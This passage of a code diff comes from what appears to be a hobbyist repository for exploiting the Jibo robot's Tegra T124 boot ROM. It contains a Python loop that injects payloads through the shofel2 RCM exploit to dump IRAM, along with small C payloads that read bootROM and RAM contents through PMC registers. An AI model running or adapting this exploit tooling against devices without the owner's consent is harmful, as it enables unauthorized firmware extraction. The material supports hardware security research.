dev.detach_kernel_driver(0)
# Reset the device to clear any 'Busy' states from shofel2
dev.reset()
# Claim the interface
usb.util.claim_interface(dev, 0)
except Exception as e:
print(f"Warning: Could not detach/claim: {e}")
return dev
def update_config(addr):
"""Write the new target address to the header file."""
with open("target_config.h", "w") as f:
f.write(f"#define TARGET_ADDR {hex(addr)}\n")
def compile_payload():
"""Run the compilation script."""
result = subprocess.run(["./compile4jibo.sh", "jibo_leaker.c"],
capture_output=True, text=True)
if result.returncode != 0:
print(f"Compilation Failed:\n{result.stderr}")
return False
return True
def run_dump():
print(f"--- Starting Jibo IRAM Deep Leak ---")
current_addr = START_ADDR
# Open file in 'append' mode so we don't lose data if we crash
with open("jibo_iram_brute.bin", "ab") as f:
while current_addr < END_ADDR:
print(f"Targeting: {hex(current_addr)}...", end="\r")
# 1. Prepare Payload
update_config(current_addr)
if not compile_payload():
break
# 2. Wait for Device
dev = get_jibo()
# 3. Inject Payload using your shofel2 tool
# Note: We use subprocess to call the existing binary
try:
subprocess.run(["sudo", "./shofel2_t124", "jibo_leaker.bin"],
capture_output=True, timeout=5)
except Exception as e:
print(f"\nInjection timeout at {hex(current_addr)}, retrying...")
continue
# 4. Catch the data
# Since the payload writes to PMC and resets, we need to read the
# USB response that Jibo sends when he re-enters RCM.
try:
# Give it a moment to execute and reboot
time.sleep(0.5)
dev = get_jibo()
# Reading the 16 bytes of the RCM header which may contain our leak
# or status info. On T124, data is often on 0x81.
data = dev.read(0x81, 16, timeout=1000)
if data:
f.write(data)
f.flush() # Force write to disk
current_addr += STEP
except usb.core.USBError as e:
# If it times out, Jibo might not have reset yet
print(f"\nUSB Error at {hex(current_addr)}: {e}")
time.sleep(1)
continue
print(f"\nDump finished. Data saved to jibo_iram_brute.bin")
if __name__ == "__main__":
run_dump()

27
depricated payloads/source/LICENSE Normal file
View File

@@ -0,0 +1,27 @@
// Copyright (c) 2020 lordrafa. All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither my name nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

27
depricated payloads/source/LICENSE.chromiumos Normal file
View File

@@ -0,0 +1,27 @@
// Copyright (c) 2010 The Chromium OS Authors. All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

20
depricated payloads/source/hello.c Normal file
View File

@@ -0,0 +1,20 @@
#define GPIO_BASE 0x6000d000
#define CLK_RST_BASE 0x60006000
void _start() {
*(volatile unsigned int *)(CLK_RST_BASE + 0x10) |= (1 << 8);
*(volatile unsigned int *)(0x7000e400 + 0x0) |=
(1 << 16); // Force CPU Power On
for (int i = 0; i < 100; i++) {
*(volatile unsigned int *)(GPIO_BASE + 0x418) = 0xFF; // Pulse High
for (volatile int j = 0; j < 1000; j++)
;
*(volatile unsigned int *)(GPIO_BASE + 0x418) = 0x00; // Pulse Low
for (volatile int j = 0; j < 1000; j++)
;
}
*(volatile unsigned int *)(0x7000e400 + 0x30) = 0x10;
}

18
depricated payloads/source/jibo_blink.c Normal file
View File

@@ -0,0 +1,18 @@
#define GPIO_BASE 0x6000d000
void _start() {
*(volatile unsigned int *)(0x60006010) |= (1 << 8);
*(volatile unsigned int *)(GPIO_BASE + 0x500 + 0x14) = 0xFF; // Port U OE
*(volatile unsigned int *)(GPIO_BASE + 0x600 + 0x14) = 0xFF; // Port V OE
*(volatile unsigned int *)(GPIO_BASE + 0x500 + 0x10) = 0xFF; // Port U CNF
*(volatile unsigned int *)(GPIO_BASE + 0x600 + 0x10) = 0xFF; // Port V CNF
while (1) {
*(volatile unsigned int *)(GPIO_BASE + 0x500 + 0x18) ^= 0xFF;
*(volatile unsigned int *)(GPIO_BASE + 0x600 + 0x18) ^= 0xFF;
for (volatile int i = 0; i < 200000; i++)
; // Visible delay
}
}

4
depricated payloads/source/jibo_exit.c Normal file
View File

@@ -0,0 +1,4 @@
void _start() {
*(volatile unsigned int *)0x40001000 = 0xDEADC0DE;
}

18
depricated payloads/source/jibo_intercept.c Normal file
View File

@@ -0,0 +1,18 @@
#define SRC_ADDR 0xFFF00000 // The BootROM Mirror
#define DEST_ADDR 0x40009000 // A different safe spot
#define COPY_SIZE 0x100 // Just a tiny 256-byte sniff
#define PMC_SCRATCH0 0x7000e450
void _start() {
unsigned int *src = (unsigned int *)SRC_ADDR;
unsigned int *dest = (unsigned int *)DEST_ADDR;
for (int i = 0; i < (COPY_SIZE / 4); i++) {
dest[i] = src[i];
}
*(volatile unsigned int *)PMC_SCRATCH0 = 0x90909090;
while (1)
;
}

12
depricated payloads/source/jibo_leak.c Normal file
View File

@@ -0,0 +1,12 @@
#define PMC_SCRATCH0 0x7000e450
#define PMC_CNTRL 0x7000e400
#define EMMC_BASE 0x70000000 // Just a test address for mapping
void _start() {
unsigned int val = *(volatile unsigned int *)0x40000000;
*(volatile unsigned int *)(PMC_SCRATCH0) = val;
*(volatile unsigned int *)(PMC_CNTRL) |= (1 << 4);
while (1)
;
}

15
depricated payloads/source/jibo_leak_ram.c Normal file
View File

@@ -0,0 +1,15 @@
#define PMC_BASE 0x7000e400
#define PMC_SCRATCH0 (PMC_BASE + 0x50)
#define PMC_CNTRL (PMC_BASE + 0x0)
#define BOOTROM_START 0xFFF00000
void _start() {
unsigned int rom_data = *(volatile unsigned int *)(BOOTROM_START);
*(volatile unsigned int *)(PMC_SCRATCH0) = rom_data;
*(volatile unsigned int *)(PMC_CNTRL) |= (1 << 4);
while (1)
;
}

Some files were not shown because too many files have changed in this diff Show More